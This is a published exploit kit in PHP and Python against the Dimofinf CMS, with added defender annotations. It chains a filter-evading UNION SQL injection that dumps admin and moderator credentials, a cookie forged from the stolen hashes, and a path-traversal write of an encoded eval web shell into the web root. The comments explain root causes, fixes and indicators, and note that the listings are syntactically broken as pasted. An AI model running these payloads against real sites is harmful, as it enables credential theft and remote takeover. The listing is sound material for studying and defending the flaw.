
DimoFinf ==> Upload via SQLi

Author: UzunDz , Published: 04-02-2014
PHP Expl0!T Code :

#############################################################################
<title> DimoFinf ==> Upload via SQLi.</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<h1> DimoFinf ==> Upload via SQLi.</h1>
<form method="POST">
Site : <input type="text" name="url" placeholder="http://localhost/dimofinf/" size=40 /> <input type="submit" name="SQli" value="H4cK iT" />
</form>
<?php

// Unlimited runtime with every PHP diagnostic suppressed: none of the cURL,
// preg or file operations below report their own failures, so an empty
// result section means "no output", not "nothing found".
set_time_limit
(0);
error_reporting(0);
/* 
    ####################
    # by Ali , UzunDz
    # UzunDz@gmail.com
    # sec4ever.com
    ####################
    
    # Vuln Code : 

    else if ( $dimofinf->GPC['action'] == "detailstat" )
    {
        $outdata = "<table class=\"tborder\" width=\"100%\">";
        $fintotal = 0;
        $unusr_total = $dimofinf->db->query_read_slave( "SELECT module,COUNT(*) AS total FROM ".TABLE_PREFIX."online WHERE ip='".$_REQUEST[ip]."' GROUP BY module  ORDER BY total DESC" );
        [...]
    }
        ip='".$_REQUEST[ip]."' // inject via post to bypass filter
        POST_DATA : ip=|sql]

    # Root cause, read from the quoted code: $_REQUEST[ip] is concatenated into
    # the SQL string with no escaping and no parameter binding. $_REQUEST merges
    # GET, POST (and by default cookie) input, so a filter that presumably only
    # inspects one of those sources leaves the query reachable through another.
    # Fix on the application side: bind the value as a query parameter (or at
    # minimum escape it through the DB layer) and reject anything that does not
    # parse as an IP address before it reaches the query.
*/

// Driver: runs when the form is submitted with a non-empty "url" field and
// performs, against that base URL, the request sequence described in the header
// comment. The listing as published is not syntactically valid PHP (for example
// `$url $_POST['url'];` has no assignment operator), so read it as a record of
// the HTTP traffic rather than as a program that runs unmodified.
if(isset($_POST['SQli']) && $_POST['url'] != ""){
    
$url $_POST['url'];

    
// Initial GET of the base URL with a Googlebot user-agent. The response
// ($cURLex) is never read afterwards and the handle is never closed.
$cURL2 curl_init();
    
curl_setopt($cURL2,CURLOPT_RETURNTRANSFER,1);
    
curl_setopt($cURL2,CURLOPT_URL,$url);
    
curl_setopt($cURL2,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    
$cURLex curl_exec($cURL2);

    echo 
"<textarea cols='80' rows='10' >";
    
$url $_POST['url'];
    
// Injected body for online.php?action=detailstat. Detection notes for the
// server side: the `ip` field opens with a quote, the UNION/SELECT keywords
// are split by MySQL conditional comments (/*!12345...*/) and percent-encoded
// letters (%55NION, %53ELECT), and the selected columns are wrapped in literal
// <x00x> ... </x00x> tags (0x3c783030783e / 0x3c2f783030783e), which are then
// looked for in the HTTP response. A WAF should normalise comments and
// URL-encoding before keyword matching; the tag pair appearing in a response
// is a reliable indicator on its own.
$adminfo "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e)/**//*!from*//**//*!profile*//**/%23";
    
$curl curl_init();
    
curl_setopt($curlCURLOPT_URL,"$url/online.php?action=detailstat");
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_POST1);
    
curl_setopt($curlCURLOPT_POSTFIELDS,$adminfo);
    
curl_setopt($curlCURLOPT_HEADERfalse);
    
$exec=curl_exec($curl);
    
curl_close($curl);
    
// $res1[1] is used below without checking that preg_match matched anything.
preg_match("#<x00x>(.*?)</x00x>#" ,$exec,$res1);
    
$admres explode(":",$res1[1]);
    echo 
"[+] $url";
    echo 
check($url);
    echo 
cpuser($url);
    // Strings received from the target ($admres) and the form ($url) are echoed
    // into this page unescaped inside the textarea, so a responding host can
    // close the textarea and inject markup into the operator's own browser.
    echo 
"\n[+] Admin :\nid : $admres[0]\nuser : $admres[1]\npass : $admres[2]\nemail : $admres[3]\n\n";
    
// The admin cookie is assembled client-side from the username, the stored
// password field and a constant. This implies the application's login cookie
// is a predictable composition of those values rather than a random
// server-side session identifier; a random token bound to a server-side
// session is the application-side fix.
$cook "dimadmlogin=$admres[1]-$admres[2]-1445767838";
    echo 
"cookie : ".$cook;
    // Row-by-row enumeration of the moderators table: one POST per row, up to
    // 4999 requests, stopping at the first response without the marker tags.
    // That request volume against a single endpoint is itself worth alerting on.
    for(
$LIMIT=1;$LIMIT<5000;$LIMIT++){
        
$modinfo "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e) from moderators LIMIT ".$LIMIT.",1/**/%23";
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL"$url/online.php?action=detailstat");
        
curl_setopt($chCURLOPT_POST1);
        
curl_setopt($chCURLOPT_POSTFIELDS,$modinfo);
        
curl_setopt($chCURLOPT_RETURNTRANSFER1);
        
curl_setopt($chCURLOPT_HEADERfalse);
        
$exec=curl_exec($ch);
        
curl_close($ch);
        
preg_match("#<x00x>(.*?)</x00x>#" ,$exec,$res2);
        if(empty(
$res2)){break;}
        
$modres explode(":",$res2[1]);
        echo 
"\n[+] Moderators id=$modres[0] :\nid : $modres[0]\nuser : $modres[1]\npass : $modres[2]\nemail : $modres[3]\n\n";
    }
    echo 
"</textarea><br /><br />";
    
upload($url,$cook);
}
function 
upload($url,$cook){ /* If the admin panel is not shielded by an extra layer (firewall / separate auth), this function tries to write a PHP file through the template editor using the forged cookie. */
    //$payload = "%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E";
    
// Defender notes. The write goes through /dimcp/style.php?action=edit with a
// `template` value of ../../x00x_BOT.php, i.e. apparently a path traversal in
// the template editor that lets an authenticated admin write outside the
// template directory and into the web root; `newtext` is the file body
// (URL-encoded PHP that evaluates a POST parameter, i.e. a web shell).
// Application-side mitigation: resolve the template path, confine it to the
// templates directory, refuse `..` and any non-template extension, and never
// write editor content to an executable location. Indicators after a
// successful run: a new file x00x_BOT.php in the web root and a POST to
// /dimcp/style.php?action=edit&stylef=default in the access log; on the
// operator's side, a dimofinf-up.txt results file (written below).
$x00x curl_init();
    
curl_setopt($x00xCURLOPT_URL$url."/dimcp/style.php?action=edit&stylef=default");
    
curl_setopt($x00xCURLOPT_COOKIE$cook);
    
curl_setopt($x00xCURLOPT_POST1);
    
// The trailing edit=%CA%CD%D1%ED%D1 appears to be the submit button's label in
// the windows-1256 encoding declared at the top of the page.
curl_setopt($x00xCURLOPT_POSTFIELDS,'template=../../x00x_BOT.php&newtext=%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E&edit=%CA%CD%D1%ED%D1');
    
curl_setopt($x00x,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0");
    
curl_setopt($x00x,CURLOPT_RETURNTRANSFER,1);
    
// $res is never inspected and the handle is never closed.
$res curl_exec($x00x);
    
//print_r($res);
    
// eregi() was removed in PHP 7.0, so this check fails on any modern
// interpreter; the @ hides the file_get_contents notice when the file is absent.
if(eregi("x00x_BOT",@file_get_contents($url."/x00x_BOT.php"))){
    echo 
"[+] <a href='".$url."/x00x_BOT.php'>".$url."/x00x_BOT.php</a> -> Upload Success\n";
    
file_put_contents("dimofinf-up.txt","$url/x00x_BOT.php\n",FILE_APPEND);
    }else {echo 
"[+] $url/ -> Upload Filed\n";}
}
function 
check($url){ /* Fingerprint: fetch /dimcp/ unauthenticated and look for the panel's own markup. */

    
// '<' and '>' act as the PCRE delimiters here, so the pattern matched is
// div class="tcat" align="center". If file_get_contents fails (allow_url_fopen
// off, host unreachable) it returns false, which matches nothing, and the
// "Protected" branch is printed regardless of the real state. Defender note:
// the verdict depends on an unauthenticated GET to /dimcp/ returning the panel
// page; an extra auth layer or IP restriction on that path changes it.
if(preg_match('<div class="tcat" align="center">',file_get_contents("$url/dimcp/"))){
        echo 
" -> Admin panel Not Protected\n";
    }else {
        echo 
" -> Admin panel Protected\n";
    }
}
function 
cpuser($url){ /* The original comment calls this a local file disclosure; what the regex actually reads is a database error message leaking the table-name prefix. */
    
// Requests the search page with a searchin value (albumss) that presumably
// makes the query fail, then scrapes `Table '<prefix>_` from the rendered SQL
// error; the author treats the prefix as the hosting account name. Defender
// note: this is information disclosure through verbose DB errors sent to the
// client; display_errors=Off plus a generic error page closes it, independent
// of the injection elsewhere in this listing.
$x preg_match("/Table '(.*?)_/",file_get_contents("$url/search.php?action=startsearch&keyword=uzundz&searchin=albumss&submit="),$cp);
    if(
$x){
    echo 
"Cpanel User -> ".$cp[1];}
}
?>

#############################################################################
PYTHON Expl0!T Code :
#############################################################################

#!C:\python\python.exe
'''
by Ali , UzunDz
UzunDz@gmail.com
Sec4ever.com
'''
# Python 2 only: urllib2 and the print statements below do not exist in
# Python 3, and the cgi module is deprecated there (removed in 3.13).
import cgi, re, urllib2
form = cgi.FieldStorage()
# Truthiness test wrapped as a function. Note that the function bodies in this
# listing have lost their indentation in the paste, so the Python section is
# not runnable as shown.
def empty( variable ):
if not variable:
return True
return False
def sqliup(url):
# SQLi
# POST to online.php?action=detailstat carrying the injected query in the `ip`
# body field (the path also sends an empty ip= query parameter). Server-side
# indicators: a quote followed by comment-split, percent-encoded UNION/SELECT
# keywords, and the literal <x00x>...</x00x> wrapper that the regex below looks
# for in the response.
data = "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e)/**//*!from*//**//*!profile*//**/%23"
path = url + '/online.php?action=detailstat&ip='
req = urllib2.Request(path,data)
sq1 = urllib2.urlopen(req).read()
find = re.findall('<x00x>(.*?)</x00x>',sq1)
if find :
print "<textarea cols='60' rows='10' >\n[+] url : "+url+"\n[+] Admin :\nid : "+find[0].split(':')[0]
print 'username : '+find[0].split(':')[1]
print 'pass : '+find[0].split(':')[2]+"</textarea>"
# upload from here
# Forged admin cookie built from the username, the stored password value and a
# constant (implying a predictable login cookie rather than a random session
# id), then a POST to the template editor with a traversal path
# (template=../../x00x_BOT.php) whose body becomes x00x_BOT.php in the web root.
# A new file of that name in the web root is the post-exploitation indicator.
cook = "dimadmlogin="+find[0].split(':')[1]+"-"+find[0].split(':')[2]+"-1445767838"
xdata = "template=../../x00x_BOT.php&newtext=%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E&edit=%CA%CD%D1%ED%D1"
xpath = url+'/dimcp/style.php?action=edit&stylef=default'
xreq = urllib2.Request(xpath,xdata)
xreq.add_header("Cookie", cook)
up = urllib2.urlopen(xreq).read()
if up :
try :
# urlopen raises HTTPError on a non-2xx status, so a missing file is reported
# through the except branch as the exception text.
check = urllib2.urlopen(url+'/x00x_BOT.php')
if check :
print 'Upload Success : <a href="%s/x00x_BOT.php">%s/x00x_BOT.php</a>'%(url,url)
else :
print 'Upload failed.'
except Exception ,e :
print e
site = form.getvalue('url')
# CGI response: header line, blank line, then the form. The `url` field is
# taken verbatim and used as the base of the outgoing requests with no
# validation of scheme or host.
print """Content-type: text/html

<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<title>DimoFinf ==> Upload via SQLi.</title>
<h1>DimoFinf ==> Upload via SQLi.</h1>
<form method="POST">
Site : <input type="text" name="url" placeholder="http://localhost/dimofinf/" size=40 /> <input type="submit" name="SQli" value="H4cK iT" />
</form>
"""
if not empty(site) :
sqliup(site)

#############################################################################
